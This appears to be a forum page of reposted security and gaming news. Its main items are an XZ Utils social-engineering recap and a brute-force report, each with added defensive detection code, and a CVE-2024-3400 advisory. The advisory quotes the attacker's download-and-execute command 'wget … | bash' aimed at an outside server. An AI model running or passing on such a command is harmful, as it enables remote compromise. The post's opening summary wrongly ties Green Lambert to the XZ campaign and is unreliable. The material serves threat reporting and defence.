SeedTheNet


  1. In the realm of advanced persistent threats (APTs), sophisticated social engineering tactics are becoming increasingly prevalent, especially in orchestrating supply chain attacks within the open-source community. Recent revelations shed light on high-end APT groups employing intricate social engineering campaigns to breach well-defended targets and propagate malicious code. One such instance involves a meticulously orchestrated scheme targeting the XZ Utils project, a venerable open-source initiative, and its maintainer, Lasse Collin. The offensive effort unfolded gradually, introducing a network of remote personas, deceptive communications, and malicious code into the project's ecosystem. The ultimate objective? To stealthily implant an exclusive-use backdoor into sshd by exploiting vulnerabilities in the XZ Utils build process, with the intent of infiltrating major Linux distributions through a large-scale supply chain attack. The campaign's modus operandi reflects a learned approach, characterized by precise forum responses tailored to specific accounts and "out-of-band" interactions, strategically engaging targets such as underground rail system simulator software users in the Middle East. This nuanced strategy was exemplified by the delivery of Green Lambert implants, showcasing the adeptness of APT groups in leveraging social engineering for nefarious ends. The infiltration, primarily orchestrated by the potentially fictitious persona Jia Cheong Tan, saw the insertion of backdoor code into XZ Utils during the months of February and March 2024. While the execution of the penetration may have appeared somewhat clumsy, the meticulous planning and patience exhibited over multiple years underscore the sophistication of the operation. The implications of such supply chain attacks extend beyond individual projects, highlighting the vulnerability of open-source ecosystems to covert manipulation. 
As the open-source community remains a cornerstone of technological innovation, safeguarding against social engineering-driven threats demands heightened vigilance, robust security protocols, and collaborative efforts to fortify the integrity of supply chains. The exposure of this intricate social engineering endeavor serves as a stark reminder of the evolving threat landscape, urging stakeholders to remain vigilant and proactive in defending against sophisticated APT tactics targeting the heart of open-source collaboration.

The original article: Social engineering for open-source supply chain attack profit

High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up “out-of-band” interactions regarding underground rail system simulator software helped deliver Green Lambert implants in the Middle East. And, in what seems to be a learned approach, the XZ Utils project penetration was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed. This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.

While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight.
This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM Solarwinds compromise and the SUNSPOT implant’s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it’s human involvement in the build process. It’s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary’s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.

One of the best publicly available chronological timelines on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It’s highly recommended reading. Notably, Cox writes: “This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.”

A Singaporean guy, an Indian guy, and a German guy walk into a bar…

Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils developer mailing lists and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.
Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities’ communications. The “Jia Tan” identity seems a bit forced as well – the only public geolocation data is a Singaporean VPN exit node that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource. Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a “jiat75” or “jiatan018” username for the “Jia Tan” Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the “JiaT75” actor.

One additional identity, Hans Jansen, introduced a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by jiaT75’s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: “Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)”. This pull request is the Jansen identity’s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a Debian bug report on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.
Jia Tan Identity and Activity

The Jia Cheong Tan (JiaT75) GitHub account, eventually promoted to co-maintainer of XZ Utils, which inserted the malicious backdoor code, was created January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022:

  • oss-fuzz
  • cpp-docs
  • wasmtime
  • xz

These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.

The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 authored hundreds of changes for the XZ project. Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias “Alden” posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024. The time differences for the malicious commits are noticeable. What might this anomaly suggest? We speculate on several possibilities:

  • the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.
  • the JiaT75 individual contributor was rushed to commit the malicious backdoor code.
  • the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.

Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75.
Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.

Summer 2022 Pressure to Add a Maintainer

Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.

Name                      GitHub account   Email                          Creation
Jia Tan/Jia Cheong Tan    JiaT75           jiat0218@gmail.com             January 26, 2021
Dennis Ens                –                dennis3ns@gmail.com            –
Jigar Kumar               –                jigarkumar17@protonmail.com    –

If we take the first interaction on the xz-devel mailing list as the start of the campaign, Jia Tan sent a superficial code patch on September 29, 2021. This timestamp is eight months after the github account creation date. This initial contribution is harmless, but establishes this identity within the open-source project. A year later, Jigar Kumar pressured Lasse Collin to hand over access to Jia Tan over the spring and summer of 2022 in six chiding comments over two different threads.

Wed, 27 Apr 2022 11:42:57 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string
“Your efforts are good but based on the slow release schedule it will unfortunatly be years until the community actually gets this quality of life feature.”

Thu, 28 Apr 2022 10:10:48 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string
“Patches spend years on this mailing list. 5.2.0 release was 7 years ago. There is no reason to think anything is coming soon.”

Fri, 27 May 2022 10:49:47 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string
“Over 1 month and no closer to being merged. Not a suprise.”

Tue, 07 Jun 2022 09:00:18 -0700 Re: [xz-devel] XZ for Java
“Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.”

Tue, 14 Jun 2022 11:16:07 -0700 Re: [xz-devel] XZ for Java
“With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?”

Wed, 22 Jun 2022 10:05:06 -0700 Re: [xz-devel] [PATCH] String to filter and filter to string
“Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?”

The Dennis Ens identity sets up a thread of their own, and follows up by pressuring maintainer Collin in one particularly forceful and obnoxious message to the list. The identity leverages a personal vulnerability that Collin shared on this thread. The Jigar Kumar identity responds twice to this thread, bitterly complaining about the maintainer: “Dennis you are better off waiting until new maintainer happens or fork yourself.”

Thu, 19 May 2022 12:26:03 -0700 XZ for Java
“Is XZ for Java still maintained? I asked a question here a week ago and have not heard back. When I view the git log I can see it has not updated in over a year. I am looking for things like multithreaded encoding / decoding and a few updates that Brett Okken had submitted (but are still waiting for merge). Should I add these things to only my local version, or is there a plan for these things in the future?”

Tue, 21 Jun 2022 13:24:47 -0700 Re: [xz-devel] XZ for Java
I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C?
Trying to maintain both means that neither are maintained well.

Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:

  • In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.
  • In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions.
  • In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.

Spring 2024 Pressure to Import Backdoored Code to Debian

Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024.
The Hans Jansen identity created a Debian report log on March 25, 2024 to raise urgency to include the backdoored code: “Dear mentors, I am looking for a sponsor for my package “xz-utils”.”

Name                        Email address
Hans Jansen                 hansjansen162@outlook.com
krygorin4545                krygorin4545@proton.me
misoeater91@tutamail.com    misoeater91@tutamail.com

The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:

Date: Tue, 26 Mar 2024 19:27:47 +0000
From: krygorin4545 <krygorin4545@proton.me>
Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression utilities
Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work

Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)
From: misoeater91@tutamail.com
Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] — XZ-format compression
I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!

The code changes received pushback from Debian contributors:

Date: Tue, 26 Mar 2024 19:27:47 +0000
From: krygorin4545 <krygorin4545@proton.me>
Subject: new upstream versions as NMU vs. xz maintenance
Very much *not* a fan of NMUs doing large changes such as new upstream versions. But this does give us the question, what’s up with the maintenance of xz-utils? Same as with the lack of security uploads of git, which you also maintain, are you active? Are you well?

To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:

Date: Wed, 27 Mar 2024 12:46:32 +0000
From: krygorin4545 <krygorin4545@proton.me>
Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance
Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn’t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (). Fixing a valgrind break across many apps throughout Debian is the priority here.

What NeXZt?

Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at prior SAS events [registration required], distilling an assessment into a manageable table. Unfortunately, we expect more open-source project incidents like XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified similar social engineering-driven incidents in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.

https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/
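The post points at one measurable signal in the JiaT75 history: the malicious commits landed at hours out of sync with the account's earlier work. The Python below is an added example of that hour-of-day profile check; it is not code from the Securelist article or from the forum post. Every commit timestamp in it is constructed for illustration (the real ones are in the XZ Utils git history); only the candidate dates (Feb 23-26 and Mar 8-9, 2024) are taken from the post.

```python
from collections import Counter
from datetime import datetime

# Constructed commit records: (commit id, author timestamp carrying the committer's
# own UTC offset). Times are invented for this example. A Sunday entry is included
# because weekend commits were normal for this account and must not be flagged.
BASELINE_COMMITS = [
    ("b1", "2022-10-03T09:15:00+08:00"),
    ("b2", "2022-10-11T09:50:00+08:00"),
    ("b3", "2022-11-02T10:05:00+08:00"),
    ("b4", "2022-11-20T10:40:00+08:00"),   # Sunday
    ("b5", "2023-01-09T14:20:00+08:00"),
    ("b6", "2023-02-14T14:55:00+08:00"),
    ("b7", "2023-03-06T16:30:00+08:00"),
    ("b8", "2023-05-22T16:10:00+08:00"),
    ("b9", "2023-06-28T20:45:00+08:00"),   # a single late-evening commit
]

# Candidate commits on the dates the post names; clock times are constructed.
CANDIDATE_COMMITS = [
    ("c1", "2024-02-23T10:30:00+08:00"),
    ("c2", "2024-02-24T03:10:00+08:00"),
    ("c3", "2024-02-26T20:05:00+08:00"),
    ("c4", "2024-03-09T02:40:00+08:00"),
]


def local_hour(ts):
    """Hour of day as the committer's own clock showed it (the offset is kept)."""
    return datetime.fromisoformat(ts).hour


def local_hour_profile(commits):
    """Count commits per local hour of day."""
    return Counter(local_hour(ts) for _, ts in commits)


def flag_out_of_pattern(commits, baseline, min_baseline_commits=2):
    """Return (commit id, local hour) for commits whose hour has fewer than
    min_baseline_commits examples in the baseline profile. One stray late
    commit in the baseline is not enough to make that hour 'usual'."""
    profile = local_hour_profile(baseline)
    usual_hours = {hour for hour, n in profile.items() if n >= min_baseline_commits}
    return [(cid, local_hour(ts)) for cid, ts in commits
            if local_hour(ts) not in usual_hours]


if __name__ == "__main__":
    print("baseline hours:", sorted(local_hour_profile(BASELINE_COMMITS).items()))
    for cid, hour in flag_out_of_pattern(CANDIDATE_COMMITS, BASELINE_COMMITS):
        print(f"{cid}: committed at local hour {hour:02d}, outside the usual pattern")
```

Git author timestamps are self-reported and trivially forged, so a hit here is a triage signal for a maintainer or reviewer to look harder at a change, not evidence on its own; the value of the check is that an actor keeping a consistent fictitious work day has to keep it up for years, and the post's observation is that in 2024 they did not.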
  2. Fat Princess, a quirky and beloved multiplayer action game released by Sony, has left a lasting impression on gamers since its debut. However, the game's discontinuation has sparked a wave of nostalgia and calls from fans for its revival. Originally released in 2009 for the PlayStation 3, Fat Princess quickly gained a dedicated following thanks to its unique blend of strategy, humor, and chaotic multiplayer battles. The game's premise, centered around rescuing a princess who can become harder to save as she consumes cake, delighted players and offered a refreshing take on the multiplayer genre. Despite its initial success and popularity, Fat Princess eventually faced the unfortunate fate of being discontinued by Sony. This decision left many fans disappointed and longing to revisit the whimsical world of cake-fueled warfare. Fans argue that a revival of Fat Princess would be well-received in today's gaming landscape, where multiplayer experiences and unique gameplay concepts continue to thrive. The game's lighthearted tone, strategic depth, and emphasis on teamwork could resonate with a wide audience, offering a refreshing alternative to more mainstream titles. Moreover, the advancements in online infrastructure and gaming platforms present an opportunity for Fat Princess to make a triumphant return with enhanced features, improved connectivity, and potential cross-platform play. As people have become sensitive to everything in modern days, would they also be sensitive to the game name and overweight people? But what we should see is another Fat Princess game! Fat Princess can be played in RPCS3 for the nostalgia!
  3. In January 2024, LittleBigPlanet 3 encountered persistent technical issues that led to the temporary shutdown of its servers for PS4. However, due to ongoing challenges, the decision has been made to keep the servers offline indefinitely. This means that all online services, including access to other players' creations, are no longer available. While this is undoubtedly disappointing news for the LittleBigPlanet 3 community, there are some important details to note. User-generated content (UGC) stored locally on your PS4 will still be accessible, allowing you to continue enjoying previously created content. However, any new UGC you create will be limited to local play on your PS4 and cannot be shared online. Despite the discontinuation of online services, offline features such as the campaign will remain fully playable. This ensures that players can still experience the core gameplay elements and enjoy the game's content independently of online connectivity. It's important for players to be aware of these changes and adjust their gameplay expectations accordingly. While the loss of online services is regrettable, LittleBigPlanet 3 still offers a rich single-player experience and access to locally stored user-generated content. The decision to keep the servers offline indefinitely reflects the challenges faced in maintaining online infrastructure and ensuring a stable and enjoyable experience for players. As the gaming landscape evolves, developers and publishers must make decisions that prioritize the long-term viability of their games while also considering the needs and expectations of their player base. https://www.playstation.com/en-us/legal/gameservers/
  4. Cisco Talos, along with the Duo Security Research team, extends its gratitude to Brandon White, Phillip Schafer, Mike Moran, and Becca Lynch for their groundbreaking research that has uncovered a concerning trend in cyberattacks. Since March 18, 2024, Cisco Talos has been closely monitoring a significant rise in brute-force attacks targeting various entities globally. These attacks are directed towards Virtual Private Network (VPN) services, web application authentication interfaces, and SSH services, posing a serious threat to cybersecurity. What's particularly alarming is that these attacks are emanating from TOR exit nodes, as well as a spectrum of other anonymizing tunnels and proxies. This sophisticated approach to conceal the attackers' identities makes it challenging to trace and thwart these malicious activities effectively. The repercussions of successful attacks of this nature can be severe, ranging from unauthorized network access and account lockouts to potential denial-of-service (DoS) scenarios. As the frequency of these attacks continues to escalate, it's imperative for organizations to fortify their defenses and remain vigilant against evolving threats. While the list of known affected services includes VPN services, web authentication interfaces, and SSH services, it's crucial to note that these attacks may extend to other services as well. Organizations across various sectors must be proactive in implementing robust security measures to mitigate the risks posed by these brute-force attacks. Depending on the target environment, successful attacks of this type may lead to unauthorized network access, account lockouts, or denial-of-service conditions. The traffic related to these attacks has increased with time and is likely to continue to rise. Known affected services are listed below. However, additional services may be impacted by these attacks. 
  • Cisco Secure Firewall VPN
  • Checkpoint VPN
  • Fortinet VPN
  • SonicWall VPN
  • RD Web Services
  • Mikrotik
  • Draytek
  • Ubiquiti

The brute-forcing attempts use generic usernames and valid usernames for specific organizations. The targeting of these attacks appears to be indiscriminate and not directed at a particular region or industry. The source IP addresses for this traffic are commonly associated with proxy services, which include, but are not limited to:

  • TOR
  • VPN Gate
  • IPIDEA Proxy
  • BigMama Proxy
  • Space Proxies
  • Nexus Proxy
  • Proxy Rack

Cisco Talos remains committed to monitoring and analyzing these threats, collaborating with industry experts, and providing timely insights and solutions to safeguard digital infrastructures against emerging cyber threats.

https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
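The post describes the activity (many failed logins per source, generic plus organization-specific usernames, sources that resolve to TOR exits and commercial proxies) without showing how a defender would spot it in their own logs. The Python below is an added example of that detection over sshd log lines; it is not code from Cisco Talos or from the forum post. The log lines and the anonymizer address set are constructed for this example (RFC 5737 test addresses); in practice the set would be fed from a TOR exit list or proxy feed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log excerpt in syslog layout. One source hammers six accounts
# in under a minute; one user mistypes once and then logs in; one stray failure.
SAMPLE_LOG = """\
Apr 18 10:00:01 vpn-gw sshd[2101]: Failed password for invalid user admin from 198.51.100.7 port 40122 ssh2
Apr 18 10:00:09 vpn-gw sshd[2103]: Failed password for invalid user test from 198.51.100.7 port 40130 ssh2
Apr 18 10:00:17 vpn-gw sshd[2105]: Failed password for invalid user guest from 198.51.100.7 port 40141 ssh2
Apr 18 10:00:24 vpn-gw sshd[2107]: Failed password for root from 198.51.100.7 port 40150 ssh2
Apr 18 10:00:31 vpn-gw sshd[2109]: Failed password for jsmith from 198.51.100.7 port 40158 ssh2
Apr 18 10:00:40 vpn-gw sshd[2111]: Failed password for invalid user user from 198.51.100.7 port 40166 ssh2
Apr 18 10:02:05 vpn-gw sshd[2120]: Failed password for jsmith from 203.0.113.5 port 51000 ssh2
Apr 18 10:02:40 vpn-gw sshd[2122]: Accepted password for jsmith from 203.0.113.5 port 51002 ssh2
Apr 18 11:15:00 vpn-gw sshd[2300]: Failed password for invalid user oracle from 192.0.2.10 port 33000 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Placeholder standing in for a TOR exit / proxy feed; constructed for this example.
ANONYMIZER_SOURCES = {"198.51.100.7"}


def parse_failures(lines, year=2024):
    """Yield (timestamp, username, source ip) for every failed-password line.
    Syslog lines carry no year, so the caller supplies it."""
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def max_in_window(timestamps, window):
    """Largest number of events inside any interval of length `window`."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while ts[end] - ts[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: summary} for sources with >= threshold failures in any window.
    The summary records the peak rate, the usernames tried (generic names mixed
    with real ones is the pattern the post describes) and the anonymizer flag."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse_failures(lines):
        by_ip[ip].append((ts, user))
    findings = {}
    for ip, events in by_ip.items():
        peak = max_in_window([t for t, _ in events], window)
        if peak >= threshold:
            findings[ip] = {
                "peak_failures": peak,
                "usernames": sorted({u for _, u in events}),
                "anonymizer_source": ip in ANONYMIZER_SOURCES,
            }
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The sliding window rather than a flat daily count keeps a user who fails twice and then succeeds out of the findings, while the username set distinguishes credential guessing across many accounts from one account under password spray; the same shape applies to VPN or web-portal authentication logs once the regular expression is swapped for that product's failed-login line.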
  5. In a surprising twist of events, the recent release of Amazon's highly anticipated Fallout TV show has reignited interest in the iconic Fallout game series. Fans old and new are diving back into the post-apocalyptic world, drawn by the show's captivating narrative and nostalgic allure. What sets the Fallout TV show apart is its faithful adaptation of the game universe, capturing the essence of the series and translating it into a compelling visual narrative. This authenticity has resonated with viewers, inspiring many to pick up the controller and experience the wasteland firsthand. For existing fans, the show serves as a nostalgic reminder of their adventures in the Fallout universe, while newcomers are intrigued by the unique blend of retro-futurism, dark humor, and moral dilemmas that define the games. The connection between the TV show and the games has created a symbiotic relationship, with each medium complementing the other to create a richer, more immersive experience. As discussions and excitement around Fallout continue to grow, the community is buzzing with theories, fan creations, and shared experiences. With the Fallout TV show acting as a catalyst, the games are once again in the spotlight, drawing in players old and new to explore the radioactive ruins, face off against mutated creatures, and navigate the complexities of a post-nuclear world. Looking at the SteamDB.info website, it shows a gain of +139.0% for Fallout 4, which brought around 35k more players. Fallout 3 saw a small jump. Fallout 76: 124%, which is around 15k more players. The Fallout 4 next-gen upgrade is slated for release on April 25.
  6. When it comes to cybersecurity, staying ahead of the game is crucial. Palo Alto Networks, along with Unit 42, is actively monitoring and responding to the latest security challenges that could affect networks worldwide. One such challenge is the critical command injection vulnerability known as CVE-2024-3400, which poses a serious risk to users of Palo Alto Networks PAN-OS software. This article takes a closer look at CVE-2024-3400, emphasizing its severity with a CVSS score of 10.0.

A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.

Required Configuration for Exposure

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal (or both) and device telemetry enabled. You can verify whether you have a GlobalProtect gateway or GlobalProtect portal configured by checking for entries in your firewall web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals) and verify whether you have device telemetry enabled by checking your firewall web interface (Device > Setup > Telemetry).

Severity: CRITICAL
CVSSv4.0 Base Score: 10 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/AU:Y/R:U/V:C/RE:M/U:Red)

Exploitation Status

Palo Alto Networks is aware of a limited number of attacks that leverage the exploitation of this vulnerability. More information about the vulnerability's exploitation in the wild can be found in the Unit 42 threat brief: https://unit42.paloaltonetworks.com/cve-2024-3400/.

Weakness Type

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Solution

This issue will be fixed in hotfix releases of PAN-OS 10.2.9-h1 (ETA: By 4/14), PAN-OS 11.0.4-h1 (ETA: By 4/14), and PAN-OS 11.1.2-h3 (ETA: By 4/14), and in all later PAN-OS versions.

Workarounds and Mitigations

Recommended Mitigation: Customers with a Threat Prevention subscription can block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184 for more information.

If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. Please see the following page for details on how to temporarily disable device telemetry: https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/device-telemetry/device-telemetry-configure/device-telemetry-disable.

Executive Summary

Palo Alto Networks and Unit 42 are engaged in tracking activity related to CVE-2024-3400 and are working with external researchers, partners and customers to share information transparently and rapidly. A critical command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0. This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with a GlobalProtect gateway and device telemetry enabled. This issue does not affect cloud firewalls (Cloud NGFW), Panorama appliances or Prisma Access. For up-to-date information about affected products and versions, please refer to the Palo Alto Networks Security Advisory on this issue. Palo Alto Networks is aware of malicious exploitation of this issue. We are tracking the initial exploitation of this vulnerability under the name Operation MidnightEclipse, as we assess with high confidence that known exploitation we’ve analyzed thus far is limited to a single threat actor. We also assess that additional threat actors may attempt exploitation in the future. This threat brief will cover information about the vulnerability and what we know about post-exploitation. We will share interim guidance to mitigate the vulnerability, though readers should also refer to the security advisory for specific product version information and remediation guidance. We will continue to update this threat brief as more information becomes available. If you believe your firewall has been compromised, please reach out to Palo Alto Networks support. This issue will be fixed in an upcoming release of PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1 and all later PAN-OS versions by ETA April 14, 2024. As a matter of best practice, Palo Alto Networks recommends that you monitor your network for abnormal activity and investigate any unexpected network activity. We would like to thank Volexity for finding this issue and their continuing coordination and partnership. Please reference Volexity’s blog for their analysis. 
Palo Alto Networks customers receive protections from and mitigations for CVE-2024-3400 and malware used in post-exploitation activity in the following ways: Palo Alto Networks recommends customers with a Threat Prevention subscription block attacks for this vulnerability by enabling Threat ID 95187 (introduced in Applications and Threats content version 8833-8682). In addition to enabling Threat ID 95187, customers must ensure vulnerability protection has been applied to their GlobalProtect interface to prevent exploitation of this issue on their device. Please see the relevant LIVEcommunity article for more information. If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. The Managed Threat Hunting section below includes XQL queries that can be used to search for signs of exploitation of this CVE. The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk. Vulnerabilities Discussed CVE-2024-3400 Table of Contents Details of the Vulnerability Current Scope of the Attack Interim Guidance Unit 42 Managed Threat Hunting Queries Conclusion Palo Alto Networks Product Protections for CVE-2024-3400 Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention Cortex XDR, XSIAM and the Unified Cloud Agent Cortex Xpanse and XSIAM ASM Module Indicators of Compromise UPSTYLE Backdoor Command and Control Infrastructure Hosted Python Backdoor Observed Commands Additional Resources Details of the Vulnerability A command injection vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. 
This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewall configurations with both a GlobalProtect gateway and device telemetry enabled. You can verify whether you have these features configured by checking for entries in your firewall web interface. Our security advisory includes a link to further instructions on how to temporarily disable device telemetry.

Palo Alto Networks is aware of targeted attacks that leverage this vulnerability. The next section covers details of the post-exploitation activity we’ve observed.

Current Scope of the Attack

As part of the activity observed in Operation MidnightEclipse, after exploitation, the threat actor created a cronjob that would run every minute to access commands hosted on an external server that would execute via bash, as seen in the following command:

wget -qO- hxxp://172.233.228[.]93/policy | bash

